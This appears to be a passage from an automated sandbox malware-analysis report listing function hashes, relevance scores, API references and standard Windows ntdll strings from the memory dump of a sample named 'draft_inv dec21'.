Instruction Fuzzy Hash: F171BE74A042499FDB05DF68C890AAEB7F6FF84708F18466DE802EB355E730AD46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1E98ACEB, Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E98AEA9
RtlDebugPrintTimes.NTDLL ref: 1E98B185

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 375523c332eeb3efdbe689127e94438d8dcd868dc67ca018378924086731b63e
Instruction ID: 22b94db48604072f8e2a00f7b2bff2ce94679b6ccc06c27598edd14712258bfe
Opcode Fuzzy Hash: 375523c332eeb3efdbe689127e94438d8dcd868dc67ca018378924086731b63e
Instruction Fuzzy Hash: 74F11672E006598FCB19CF68C8A0A7DBBF6AF8820071A476DD456DB394E774E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1E8DEE48, Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c35b5c8876e87fcb1666956197b38c39bd9a379330fe326f760afbcb267188cc
Instruction ID: 334d5de6910d52b6bca45d495cbf0c4510ebf8ca9fd50bc3a81404120ee235bb
Opcode Fuzzy Hash: c35b5c8876e87fcb1666956197b38c39bd9a379330fe326f760afbcb267188cc
Instruction Fuzzy Hash: D9E10274D00749CFCB25CFAAC980A9DBBF6FF48314F104A6AE446A72A4D730A885DF10

Uniqueness

Uniqueness Score: -1.00%

Function 1E98A1F0, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E98A25D
RtlDebugPrintTimes.NTDLL ref: 1E98A2F1
RtlDebugPrintTimes.NTDLL ref: 1E98A314
RtlDebugPrintTimes.NTDLL ref: 1E98A340
RtlDebugPrintTimes.NTDLL ref: 1E98A415
RtlDebugPrintTimes.NTDLL ref: 1E98A468
RtlDebugPrintTimes.NTDLL ref: 1E98A487
RtlDebugPrintTimes.NTDLL ref: 1E98A4B8

Strings

HEAP: , xrefs: 1E98A206

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: a40a5f473b1f0cf0c69d9f80fd5a44d0e75e4abb5d132201cf64007cb28200e3
Instruction ID: ba22ce24be896bb6e49efbbea1a5bf780cbd73c5d388c40602c0ebde9fa07885
Opcode Fuzzy Hash: a40a5f473b1f0cf0c69d9f80fd5a44d0e75e4abb5d132201cf64007cb28200e3
Instruction Fuzzy Hash: E1A18E7161821A8FC745CE28C894E2AB7E6FF98314F054A6EE945DB360E7B4EC41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1E8E7550, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 1E924592
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E924460
Execute=1, xrefs: 1E92451E
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E924507
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E924530
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E92454D
ExecuteOptions, xrefs: 1E9244AB

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 68c7b5241be878527d4139e8a70a5ca4e923075c703e2306a0e68d2472f2818d
Instruction ID: 9f5fd33b0901870ab60edc0c253b26bc7fb6f5b3a6bf0ba6dd0cd328526627c2
Opcode Fuzzy Hash: 68c7b5241be878527d4139e8a70a5ca4e923075c703e2306a0e68d2472f2818d
Instruction Fuzzy Hash: 4E512835A00259BBEF10ABE9DC95FAD73B9EF49304F000BADE505A76C0E771AA458F50

Uniqueness

Uniqueness Score: -1.00%

Function 1E8CA170, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E917807
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9177E2
SsHd, xrefs: 1E8CA304
Actx , xrefs: 1E917819, 1E917880
RtlpFindActivationContextSection_CheckParameters, xrefs: 1E9177DD, 1E917802
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1E9178F3

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 38f28e8324584f753280e1d1fdb86af915b42fb367cde38086f9af5baf33909f
Instruction ID: b0f5a561f0e14f9883b8801090afa7116563c0963e45700da961217d5cbd5f86
Opcode Fuzzy Hash: 38f28e8324584f753280e1d1fdb86af915b42fb367cde38086f9af5baf33909f
Instruction Fuzzy Hash: F5E1D170A043468FD715CF65C9A0B9AF7E6BF86224F104BADE866CB2D0D731D845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1E8CD690, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E919299

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919178
GsHd, xrefs: 1E8CD794
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919153
Actx , xrefs: 1E919315
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E919372
RtlpFindActivationContextSection_CheckParameters, xrefs: 1E91914E, 1E919173

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: 39e568aa5e97859da72d087657729e9edb47046c33339f0de35c10a510ebb4dc
Instruction ID: 8cb2b3911b704a202e9d2fdb0f0fb3e7eed4f5ca16d285c3a435b84e11cf4631
Opcode Fuzzy Hash: 39e568aa5e97859da72d087657729e9edb47046c33339f0de35c10a510ebb4dc
Instruction Fuzzy Hash: 78E18B706083468FD711DF19C890B9AB7E6FF89328F044B2DE9959B2C1D770E985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1E95F0A5, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E95F0D6

Strings

Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 1E95F33E
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1E95F389
Just allocated block at %p for %Ix bytes, xrefs: 1E95F288
HEAP: , xrefs: 1E95F274, 1E95F321, 1E95F378
RtlAllocateHeap, xrefs: 1E95F0ED
HEAP[%wZ]: , xrefs: 1E95F267, 1E95F314, 1E95F36B

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: a203ea23dde56675827ecd0ab54f6f4e50151de06bec282acdb102b504e167dc
Instruction ID: 2d94a5c9a988b3e493ec3fa9cc57b77efa3ac50c77b673759c62eaa1c51d84ff
Opcode Fuzzy Hash: a203ea23dde56675827ecd0ab54f6f4e50151de06bec282acdb102b504e167dc
Instruction Fuzzy Hash: B591F039904685DFDB12CFA8C450AADBBF6FF89360F148A5EE845AB751C735A980CF10

Uniqueness

Uniqueness Score: -1.00%

Function 1E8A640D, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8A651C

Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A6614
Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A665F

Strings

LdrpInitShimEngine, xrefs: 1E909783, 1E909796, 1E9097BF
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1E9097B9
Getting the shim engine exports failed with status 0x%08lx, xrefs: 1E909790
apphelp.dll, xrefs: 1E8A6446
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1E90977C
minkernel\ntdll\ldrinit.c, xrefs: 1E9097A0, 1E9097C9

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: c059ece442175e862d09354e45c88da8f0d86b3d29cef5a436d35730b6bb96eb
Instruction ID: b26201a72db98c48a8fd27ac8551fc92e610eebc3401239488854cdd96f07028
Opcode Fuzzy Hash: c059ece442175e862d09354e45c88da8f0d86b3d29cef5a436d35730b6bb96eb
Instruction Fuzzy Hash: 4F518C766083449FD311DF24D890BABB7E9BFC4644F440A1DFA95972A4EB30E904DB92

Uniqueness

Uniqueness Score: -1.00%

Function 1E92FA02, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E92FAF3
RtlDebugPrintTimes.NTDLL ref: 1E92FB15

Strings

minkernel\ntdll\ldrdload.c, xrefs: 1E92FA68
$, xrefs: 1E92FABD
LdrpRedirectDelayloadFailure, xrefs: 1E92FA5E
Unknown, xrefs: 1E92FA42, 1E92FA54
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 1E92FA58

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 418b33b8c2c6ec15cec2ae322837331767e369f2d8b8cc52f7a7139c3d7458c1
Instruction ID: 547ad52d1f5df5de6dd0bd51f64202b0da35348653418bbf5b0a0499c7004d3f
Opcode Fuzzy Hash: 418b33b8c2c6ec15cec2ae322837331767e369f2d8b8cc52f7a7139c3d7458c1
Instruction Fuzzy Hash: 88415E7590121AABCF02CF95C894AEEBBBABF88354F54022DE905B7344D7719941DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E8B9046, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E912360

Strings

@, xrefs: 1E8B9095
$, xrefs: 1E8B90B1
@w9v, xrefs: 1E91245B

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@$@w9v
API String ID: 3446177414-1706906297
Opcode ID: e26063e3f05b1aa997a426d17ce9f8b320ae7ca24839c3c8c8f7ad7ed74c497e
Instruction ID: c98bde17c0fa261a47899e7984c6b9e6e5bb54824f4baee5c868f2f75c61a0cd
Opcode Fuzzy Hash: e26063e3f05b1aa997a426d17ce9f8b320ae7ca24839c3c8c8f7ad7ed74c497e
Instruction Fuzzy Hash: 2F812BB5D002A9DBDB21DB54CC44BDEB6B9AF48710F0446EAE909B7290D7309E85DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E95F8F8, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E95F92E

Strings

RtlFreeHeap, xrefs: 1E95F948, 1E95F9B2
About to free block at %p, xrefs: 1E95FA0A
About to free block at %p with tag %ws, xrefs: 1E95FAFE
HEAP: , xrefs: 1E95F9F9, 1E95FAE4
HEAP[%wZ]: , xrefs: 1E95F9EC, 1E95FAD7

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: f91e6a1a3a1764e5881a8a5dc3c69109d257b6fd832e1517975bf961d946279f
Instruction ID: aeaa8dcbf8dbce52ba6ce0f1a8adb7197c6c2d88cf2f96835c8eb15044b4c92e
Opcode Fuzzy Hash: f91e6a1a3a1764e5881a8a5dc3c69109d257b6fd832e1517975bf961d946279f
Instruction Fuzzy Hash: 7C71BE35904685EFCB02DFA8D8A0AADFBF6FF89220F04865EE4459B351D735A980CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1E8A6565, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8A6614
RtlDebugPrintTimes.NTDLL ref: 1E8A665F

Strings

LdrpLoadShimEngine, xrefs: 1E90984A, 1E90988B
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909885
minkernel\ntdll\ldrinit.c, xrefs: 1E909854, 1E909895
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909843

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: caf96870fc8b907e7af400f2a6f0ea852e67359adf276239a552d818ba73a0c2
Instruction ID: 682e3a91715ebe75fade4b67ead3a57acf4bb3dda9fadc46434c60c8b781e3a4
Opcode Fuzzy Hash: caf96870fc8b907e7af400f2a6f0ea852e67359adf276239a552d818ba73a0c2
Instruction Fuzzy Hash: B551C575A143989FDB04DBACCC94AED77B6BFC0704F440729E951AB299DB70AC40DB80

Uniqueness

Uniqueness Score: -1.00%

Function 1E8DD6D0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8DD879

Part of subcall function 1E8B4779: RtlDebugPrintTimes.NTDLL ref: 1E8B4817

Strings

$, xrefs: 1E8DD78D
$, xrefs: 1E8DD820
minkernel\ntdll\ldrinit.c, xrefs: 1E91F0E2
Process 0x%p (%wZ) exiting, xrefs: 1E91F0D1
LdrShutdownProcess, xrefs: 1E91F0D8

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: c1130e7e8669445e8c4ba47fa0d1b826a21e89d755ff5f5583e68731259bbb83
Instruction ID: 77e7f194914af7331846821446534c7fd975cd5619fb499ed6ba79e2d4029400
Opcode Fuzzy Hash: c1130e7e8669445e8c4ba47fa0d1b826a21e89d755ff5f5583e68731259bbb83
Instruction Fuzzy Hash: 5A51B075A0838A9FDB05DFA8C48479DBBB2BF84324F244799D4016B2C1D774A989CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1E95ECD7, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E95EDD0
RtlDebugPrintTimes.NTDLL ref: 1E95EE45

Strings

---------------------------------------, xrefs: 1E95EDF9
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1E95EDE3
Entry Heap Size , xrefs: 1E95EDED
HEAP: , xrefs: 1E95ECDD

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 2c55faccb35043b79ec81085057293245eaa467a498317241b3f1f7b0adc4b37
Instruction ID: c868dafd79be457cf34d8ee75ffd9967d4b38b90fae92619c0905e85f5acb4a6
Opcode Fuzzy Hash: 2c55faccb35043b79ec81085057293245eaa467a498317241b3f1f7b0adc4b37
Instruction Fuzzy Hash: 6841A035A10265DFC715CF19C484969BBEAFF86354725C66EE5059B311D732EC42CF80

Uniqueness

Uniqueness Score: -1.00%

Function 1E8D237A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1E91A79F
apphelp.dll, xrefs: 1E8D2382
LdrpDynamicShimModule, xrefs: 1E91A7A5
minkernel\ntdll\ldrinit.c, xrefs: 1E91A7AF

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: d4708db23695592a5202b63dac98325e3e7f7c69ddcbd7ebfb0415e3da182b1e
Instruction ID: 1f1e4e0474150e321b77c28bd2b8f411c3b34d0dc6717ae0890b619ad47358da
Opcode Fuzzy Hash: d4708db23695592a5202b63dac98325e3e7f7c69ddcbd7ebfb0415e3da182b1e
Instruction Fuzzy Hash: C1311276A04259EBD7159F29CCC0A9E77FAFFC0B20F14026DE911AB254E7B4AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E8AF8B0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E90E51F

Strings

HEAP: , xrefs: 1E90E49D
HEAP[%wZ]: , xrefs: 1E90E490
(HeapHandle != NULL), xrefs: 1E90E4A8

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: 8e7dc8a89f7fe1fd8b01ed148f73f4ad947f9e72e5fd6f67020f0503b25cf44c
Instruction ID: 307c4f4e8f421d2bf7b35f46c5c7d3b133776947de916ac59e53f4f42b6af5c4
Opcode Fuzzy Hash: 8e7dc8a89f7fe1fd8b01ed148f73f4ad947f9e72e5fd6f67020f0503b25cf44c
Instruction Fuzzy Hash: 1891E975604695AFC726CB29C850B6EB7AABFC4644F040B5DFA419B3C1DB34F881CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1E8D9723, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8D9922

Strings

Unmapping DLL "%wZ", xrefs: 1E91DAEE
LdrpUnloadNode, xrefs: 1E91DAF5
minkernel\ntdll\ldrsnap.c, xrefs: 1E91DAFF

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: 327ee4a9f29d3afaa92717f7b94d5f985897b93956a00249fa3975773f5e744c
Instruction ID: 26231f69fd9affdda2d8a923c04133c5bf282a4dcbabc8451240df92e4f22833
Opcode Fuzzy Hash: 327ee4a9f29d3afaa92717f7b94d5f985897b93956a00249fa3975773f5e744c
Instruction Fuzzy Hash: 635103346047469BC714DF38C884A6977A3BFC4724F180B2DE556AB6D5EBB0E819CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1E8EC640, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8EC6DF

Strings

minkernel\ntdll\ldrinit.c, xrefs: 1E9280F3
Failed to reallocate the system dirs string !, xrefs: 1E9280E2
LdrpInitializePerUserWindowsDirectory, xrefs: 1E9280E9

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 2de34aacfefc48e9f657c1b94328eda0ece676b0a917078bd556cb190353ea88
Instruction ID: 3deba6ef43fa002e508b819e1729657c9f121ec7db323456b1033ad7a258b6ef
Opcode Fuzzy Hash: 2de34aacfefc48e9f657c1b94328eda0ece676b0a917078bd556cb190353ea88
Instruction Fuzzy Hash: 4E41C3B5918395ABC711DF68DC80B9B77E9AFC5650F014B2EF948972A5EB30E800CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1E9343D5, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E934489

Strings

LdrpCheckRedirection, xrefs: 1E93450F
minkernel\ntdll\ldrredirect.c, xrefs: 1E934519
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1E934508

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 80c46eede089bfe77bbfc0ffe475d33ea95d92ee51f74c400111ede1f5d1d829
Instruction ID: f9baf58a8a3cb25319cb36b62dde0c12f4ec6237ce1c593a6330d4a4a365dbf9
Opcode Fuzzy Hash: 80c46eede089bfe77bbfc0ffe475d33ea95d92ee51f74c400111ede1f5d1d829
Instruction Fuzzy Hash: 5B41B03A6142219BCB12CF79D848A5677EBAF88752B270B7DEC9897355D730EC008F91

Uniqueness

Uniqueness Score: -1.00%

Function 1E935B90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

